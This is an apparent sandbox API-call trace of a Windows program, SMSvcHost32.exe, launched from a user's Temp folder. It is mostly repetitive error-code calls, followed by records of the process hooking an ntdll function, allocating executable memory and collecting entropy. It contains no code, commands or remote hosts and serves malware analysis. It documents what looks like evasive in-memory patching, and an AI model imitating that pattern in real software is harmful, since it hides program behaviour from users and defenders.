	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.600] SetLastError (dwErrCode=0x0) 
	[0083.600] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.601] GetLastError () returned 0x0
	[0083.601] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.602] GetLastError () returned 0x0
	[0083.602] SetLastError (dwErrCode=0x0) 
	[0083.603] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0083.603] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0083.605] GetLastError () returned 0x0
	[0083.605] SetLastError (dwErrCode=0x0) 
	[0083.605] GetLastError () returned 0x0
	[0083.605] SetLastError (dwErrCode=0x0) 
	[0083.605] GetLastError () returned 0x0
	[0083.605] SetLastError (dwErrCode=0x0) 
	[0083.605] GetLastError () returned 0x0
	[0083.605] SetLastError (dwErrCode=0x0) 
	[0083.639] DisableThreadLibraryCalls (hLibModule=0x4a40000) returned 0
	[0083.639] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0083.639] GetProcAddress (hModule=0x77960000, lpProcName="RtlPcToFileHeader") returned 0x779b5100
	[0083.640] GetCurrentThreadId () returned 0x560
	[0083.640] GetCurrentThread () returned 0xfffffffe
	[0083.640] GetCurrentThread () returned 0xfffffffe
	[0083.640] GetCurrentThreadId () returned 0x560
	[0083.640] VirtualQuery (in: lpAddress=0x6fff0000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6fff0000, AllocationBase=0x6fff0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6ffe0000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6ffe0000, AllocationBase=0x6ffa0000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6ff90000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6ff90000, AllocationBase=0x6ff90000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6ff80000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6ff80000, AllocationBase=0x6ff70000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6ff60000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6ff60000, AllocationBase=0x6ff60000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6ff50000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6ff50000, AllocationBase=0x6ff40000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6ff30000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6ff30000, AllocationBase=0x6ff20000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6ff10000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6ff10000, AllocationBase=0x6fef0000, AllocationProtect=0x80, RegionSize=0x5000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6fee0000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6fee0000, AllocationBase=0x6fe80000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6fe70000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6fe70000, AllocationBase=0x6fe50000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6fe40000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6fe40000, AllocationBase=0x6fe20000, AllocationProtect=0x80, RegionSize=0x5000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6fe10000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6fe10000, AllocationBase=0x6fe00000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6fdf0000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6fdf0000, AllocationBase=0x6fdf0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6fde0000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6fde0000, AllocationBase=0x6fdc0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6fdb0000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6fdb0000, AllocationBase=0x6fd90000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c
	[0083.640] VirtualQuery (in: lpAddress=0x6fd80000, lpBuffer=0x203fbd0, dwLength=0x1c | out: lpBuffer=0x203fbd0*(BaseAddress=0x6fd80000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c
	[0083.640] VirtualAlloc (lpAddress=0x6fd80000, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x40) returned 0x6fd80000
	[0083.641] VirtualProtect (in: lpAddress=0x779b5100, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x203fc48 | out: lpflOldProtect=0x203fc48*=0x20) returned 1
	[0083.642] GetCurrentThreadId () returned 0x560
	[0083.645] GetCurrentProcess () returned 0xffffffff
	[0083.647] VirtualProtect (in: lpAddress=0x779b5100, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x203f9a4 | out: lpflOldProtect=0x203f9a4*=0x40) returned 1
	[0083.648] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x779b5100, dwSize=0x5) returned 1
	[0083.648] GetCurrentProcess () returned 0xffffffff
	[0083.672] VirtualProtect (in: lpAddress=0x6fd80000, dwSize=0x10000, flNewProtect=0x20, lpflOldProtect=0x203f990 | out: lpflOldProtect=0x203f990*=0x40) returned 1
	[0083.673] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6fd80000, dwSize=0x10000) returned 1
	[0083.674] GetCommandLineA () returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz"
	[0083.709] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a98b0c) returned 0x0
	[0083.710] GetCurrentProcess () returned 0xffffffff
	[0083.710] SetProcessWorkingSetSize (hProcess=0xffffffff, dwMinimumWorkingSetSize=0xffffffff, dwMaximumWorkingSetSize=0xffffffff) returned 1
	[0084.065] GetCurrentProcessId () returned 0xdb8
	[0084.066] GetLastError () returned 0x7e
	[0084.066] SetLastError (dwErrCode=0x7e) 
	[0084.066] GetLastError () returned 0x7e
	[0084.066] SetLastError (dwErrCode=0x7e) 
	[0084.066] OutputDebugStringA (lpOutputString="3512:C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz Ignition....\n") 
	[0084.067] GetLastError () returned 0x7e
	[0084.067] SetLastError (dwErrCode=0x7e) 
	[0084.067] GetLastError () returned 0x7e
	[0084.067] SetLastError (dwErrCode=0x7e) 
	[0084.067] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x648
	[0084.068] GetSystemInfo (in: lpSystemInfo=0x203fac0 | out: lpSystemInfo=0x203fac0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0084.068] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x32a0000
	[0084.068] VirtualProtect (in: lpAddress=0x32a0000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x203fad4 | out: lpflOldProtect=0x203fad4*=0x40) returned 1
	[0084.068] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x32b0000
	[0084.069] VirtualProtect (in: lpAddress=0x32b0000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x203fb64 | out: lpflOldProtect=0x203fb64*=0x40) returned 1
	[0084.070] GetLastError () returned 0x0
	[0084.070] SetLastError (dwErrCode=0x0) 
	[0084.070] GetLastError () returned 0x0
	[0084.070] SetLastError (dwErrCode=0x0) 
	[0084.070] GetLastError () returned 0x0
	[0084.070] SetLastError (dwErrCode=0x0) 
	[0084.070] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x650
	[0084.070] SetErrorMode (uMode=0x8003) returned 0x2
	[0084.071] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0084.071] GetProcAddress (hModule=0x77960000, lpProcName="RtlNtStatusToDosError") returned 0x779b83c0
	[0084.071] GetProcAddress (hModule=0x77960000, lpProcName="NtDeviceIoControlFile") returned 0x779d6cf0
	[0084.071] GetProcAddress (hModule=0x77960000, lpProcName="NtQueryInformationFile") returned 0x779d6d90
	[0084.072] GetProcAddress (hModule=0x77960000, lpProcName="NtSetInformationFile") returned 0x779d6f10
	[0084.072] GetProcAddress (hModule=0x77960000, lpProcName="NtQueryVolumeInformationFile") returned 0x779d7130
	[0084.072] GetProcAddress (hModule=0x77960000, lpProcName="NtQueryDirectoryFile") returned 0x779d6ff0
	[0084.072] GetProcAddress (hModule=0x77960000, lpProcName="NtQuerySystemInformation") returned 0x779d7000
	[0084.072] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.072] GetProcAddress (hModule=0x765a0000, lpProcName="GetQueuedCompletionStatusEx") returned 0x765e10f0
	[0084.073] GetProcAddress (hModule=0x765a0000, lpProcName="SetFileCompletionNotificationModes") returned 0x765b9dd0
	[0084.073] GetProcAddress (hModule=0x765a0000, lpProcName="CreateSymbolicLinkW") returned 0x765e0830
	[0084.073] GetProcAddress (hModule=0x765a0000, lpProcName="CancelIoEx") returned 0x765bf450
	[0084.073] GetProcAddress (hModule=0x765a0000, lpProcName="InitializeConditionVariable") returned 0x77986710
	[0084.073] GetProcAddress (hModule=0x765a0000, lpProcName="SleepConditionVariableCS") returned 0x775f7f60
	[0084.074] GetProcAddress (hModule=0x765a0000, lpProcName="SleepConditionVariableSRW") returned 0x775f7fb0
	[0084.074] GetProcAddress (hModule=0x765a0000, lpProcName="WakeAllConditionVariable") returned 0x779c8d70
	[0084.074] GetProcAddress (hModule=0x765a0000, lpProcName="WakeConditionVariable") returned 0x779cc720
	[0084.074] GetProcAddress (hModule=0x765a0000, lpProcName="CancelSynchronousIo") returned 0x765e05a0
	[0084.074] GetProcAddress (hModule=0x765a0000, lpProcName="GetFinalPathNameByHandleW") returned 0x765c6ac0
	[0084.074] LoadLibraryA (lpLibFileName="powrprof.dll") returned 0x74770000
	[0084.075] GetProcAddress (hModule=0x74770000, lpProcName="PowerRegisterSuspendResumeNotification") returned 0x74775ea0
	[0084.075] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77810000
	[0084.075] GetProcAddress (hModule=0x77810000, lpProcName="SetWinEventHook") returned 0x7782fc00
	[0084.075] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x203fa60 | out: lpWSAData=0x203fa60) returned 0
	[0084.075] htons (hostshort=0x0) returned 0x0
	[0084.075] htons (hostshort=0x0) returned 0x0
	[0084.075] socket (af=2, type=1, protocol=0) returned 0x6e4
	[0084.076] getsockopt (in: s=0x6e4, level=65535, optname=8197, optval=0x203f7e8, optlen=0x203f7e4 | out: optval="f", optlen=0x203f7e4) returned 0
	[0084.076] closesocket (s=0x6e4) returned 0
	[0084.076] socket (af=23, type=1, protocol=0) returned 0x6e4
	[0084.076] getsockopt (in: s=0x6e4, level=65535, optname=8197, optval=0x203f7e8, optlen=0x203f7e4 | out: optval="f", optlen=0x203f7e4) returned 0
	[0084.076] closesocket (s=0x6e4) returned 0
	[0084.076] SetConsoleCtrlHandler (HandlerRoutine=0x4b234a0, Add=1) returned 1
	[0084.076] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x6e4
	[0084.076] CreateFileW (lpFileName="CONOUT$" (normalized: "\\device\\condrv\\currentout"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0084.077] QueueUserWorkItem (Function=0x4b394f0, Context=0x0, Flags=0x10) returned 1
	[0084.077] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0084.077] QueryPerformanceFrequency (in: lpFrequency=0x203fc08 | out: lpFrequency=0x203fc08) returned 1
	[0084.077] PowerRegisterSuspendResumeNotification (in: Flags=0x2, Recipient=0x203fc10, RegistrationHandle=0x203fc04 | out: RegistrationHandle=0x203fc04) returned 0x0
	[0084.077] SetEvent (hEvent=0x650) returned 1
	[0084.077] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x1) returned 0x6f8
	[0084.077] QueryPerformanceCounter (in: lpPerformanceCount=0x203fc20 | out: lpPerformanceCount=0x203fc20*=1816658400000) returned 1
	[0084.077] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0084.077] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0084.077] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0084.077] GetStartupInfoW (in: lpStartupInfo=0x203fc08 | out: lpStartupInfo=0x203fc08*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4b1e064, hStdOutput=0x4fa7a48, hStdError=0x4a9ed2e)) 
	[0084.078] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x710
	[0084.078] InterlockedExchangeAdd (in: Addend=0x4fa3a38, Value=1 | out: Addend=0x4fa3a38) returned 0
	[0084.079] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x714
	[0084.079] InterlockedExchangeAdd (in: Addend=0x4fa3a3c, Value=1 | out: Addend=0x4fa3a3c) returned 0
	[0084.079] GetSystemInfo (in: lpSystemInfo=0x203fbac | out: lpSystemInfo=0x203fbac*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0084.081] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x718
	[0084.081] OpenThread (dwDesiredAccess=0x4a, bInheritHandle=0, dwThreadId=0x560) returned 0x71c
	[0084.081] GetSystemInfo (in: lpSystemInfo=0x203fb44 | out: lpSystemInfo=0x203fb44*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0084.082] GetCurrentThreadId () returned 0x560
	[0084.082] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x74aa0000
	[0084.082] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x765a0000
	[0084.082] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x77490000
	[0084.082] GetProcAddress (hModule=0x77490000, lpProcName="NetStatisticsGet") returned 0x77492a40
	[0084.083] GetProcAddress (hModule=0x77490000, lpProcName="NetApiBufferFree") returned 0x6ff916d0
	[0084.083] NetStatisticsGet (in: ServerName=0x0, Service=0x4ecdaa8, Level=0x0, Options=0x0, Buffer=0x203f6c8 | out: Buffer=0x203f6c8) returned 0x0
	[0084.231] GetCurrentThreadId () returned 0x560
	[0084.231] NetApiBufferFree (Buffer=0x57ac30) returned 0x0
	[0084.231] NetStatisticsGet (in: ServerName=0x0, Service=0x4ecda8c, Level=0x0, Options=0x0, Buffer=0x203f6c8 | out: Buffer=0x203f6c8) returned 0x0
	[0084.236] GetCurrentThreadId () returned 0x560
	[0084.236] NetApiBufferFree (Buffer=0x31b6358) returned 0x0
	[0084.236] FreeLibrary (hLibModule=0x77490000) returned 1
	[0084.236] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptAcquireContextW") returned 0x74ac0590
	[0084.237] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptGenRandom") returned 0x74ac10a0
	[0084.237] GetProcAddress (hModule=0x74aa0000, lpProcName="CryptReleaseContext") returned 0x74ac0650
	[0084.237] CryptAcquireContextW (in: phProv=0x203f6ac, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x203f6ac*=0x584918) returned 1
	[0084.238] CryptGenRandom (in: hProv=0x584918, dwLen=0x40, pbBuffer=0x203fa70 | out: pbBuffer=0x203fa70) returned 1
	[0084.238] GetCurrentThreadId () returned 0x560
	[0084.238] CryptReleaseContext (hProv=0x584918, dwFlags=0x0) returned 1
	[0084.238] CryptAcquireContextW (in: phProv=0x203f6ac, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x203f6ac*=0x584918) returned 0
	[0084.238] FreeLibrary (hLibModule=0x74aa0000) returned 1
	[0084.238] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0084.238] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0
	[0084.238] GetProcessWindowStation () returned 0x90
	[0084.239] GetUserObjectInformationW (in: hObj=0x90, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x203f638 | out: pvInfo=0x0, lpnLengthNeeded=0x203f638) returned 0
	[0084.239] GetLastError () returned 0x7a
	[0084.239] GetUserObjectInformationW (in: hObj=0x90, nIndex=2, pvInfo=0x203f610, nLength=0x10, lpnLengthNeeded=0x203f638 | out: pvInfo=0x203f610, lpnLengthNeeded=0x203f638) returned 1
	[0084.239] wcsstr (_Str="WinSta0", _SubStr="Service-0x") returned 0x0
	[0084.239] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77810000
	[0084.239] GetProcAddress (hModule=0x77810000, lpProcName="GetForegroundWindow") returned 0x77848cb0
	[0084.239] GetProcAddress (hModule=0x77810000, lpProcName="GetCursorInfo") returned 0x7784c160
	[0084.239] GetProcAddress (hModule=0x77810000, lpProcName="GetQueueStatus") returned 0x7782e1b0
	[0084.240] GetForegroundWindow () returned 0x1008c
	[0084.240] GetCurrentThreadId () returned 0x560
	[0084.240] GetCursorInfo (in: pci=0x203fa5c | out: pci=0x203fa5c) returned 1
	[0084.240] GetQueueStatus (flags=0xbf) returned 0x0
	[0084.240] GetCurrentThreadId () returned 0x560
	[0084.240] FreeLibrary (hLibModule=0x77810000) returned 1
	[0084.240] GetProcAddress (hModule=0x765a0000, lpProcName="CreateToolhelp32Snapshot") returned 0x765c7b50
	[0084.240] GetProcAddress (hModule=0x765a0000, lpProcName="CloseToolhelp32Snapshot") returned 0x0
	[0084.241] GetProcAddress (hModule=0x765a0000, lpProcName="Heap32First") returned 0x765e3f00
	[0084.241] GetProcAddress (hModule=0x765a0000, lpProcName="Heap32Next") returned 0x765e4270
	[0084.241] GetProcAddress (hModule=0x765a0000, lpProcName="Heap32ListFirst") returned 0x765e4120
	[0084.241] GetProcAddress (hModule=0x765a0000, lpProcName="Heap32ListNext") returned 0x765e41d0
	[0084.241] GetProcAddress (hModule=0x765a0000, lpProcName="Process32First") returned 0x765bf4d0
	[0084.242] GetProcAddress (hModule=0x765a0000, lpProcName="Process32Next") returned 0x765bd1c0
	[0084.242] GetProcAddress (hModule=0x765a0000, lpProcName="Thread32First") returned 0x765c5c50
	[0084.242] GetProcAddress (hModule=0x765a0000, lpProcName="Thread32Next") returned 0x765c5150
	[0084.242] GetProcAddress (hModule=0x765a0000, lpProcName="Module32First") returned 0x765e44b0
	[0084.242] GetProcAddress (hModule=0x765a0000, lpProcName="Module32Next") returned 0x765e4660
	[0084.242] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x74c
	[0084.252] GetTickCount () returned 0x28b4e
	[0084.252] Heap32ListFirst (hSnapshot=0x74c, lphl=0x203fa60) returned 1
	[0084.252] GetCurrentThreadId () returned 0x560
	[0084.253] Heap32First (lphe=0x203f65c, th32ProcessID=0xdb8, th32HeapID=0x4c0000) returned 1
	[0084.269] GetCurrentThreadId () returned 0x560
	[0084.269] Heap32Next (lphe=0x203f65c) returned 1
	[0084.286] GetTickCount () returned 0x28b6d
	[0084.286] GetCurrentThreadId () returned 0x560
	[0084.286] Heap32Next (lphe=0x203f65c) returned 1
	[0084.302] GetTickCount () returned 0x28b7d
	[0084.302] GetCurrentThreadId () returned 0x560
	[0084.302] Heap32Next (lphe=0x203f65c) returned 1
	[0084.346] GetTickCount () returned 0x28bac
	[0084.346] GetCurrentThreadId () returned 0x560
	[0084.346] Heap32Next (lphe=0x203f65c) returned 1
	[0084.362] GetTickCount () returned 0x28bbb
	[0084.362] GetCurrentThreadId () returned 0x560
	[0084.362] Heap32Next (lphe=0x203f65c) returned 1
	[0084.392] GetTickCount () returned 0x28bdb
	[0084.392] GetCurrentThreadId () returned 0x560
	[0084.392] Heap32Next (lphe=0x203f65c) returned 1
	[0084.408] GetTickCount () returned 0x28bea
	[0084.408] GetCurrentThreadId () returned 0x560
	[0084.408] Heap32Next (lphe=0x203f65c) returned 1
	[0084.448] GetTickCount () returned 0x28c09
	[0084.448] GetCurrentThreadId () returned 0x560
	[0084.448] Heap32Next (lphe=0x203f65c) returned 1
	[0084.467] GetTickCount () returned 0x28c29
	[0084.467] GetCurrentThreadId () returned 0x560
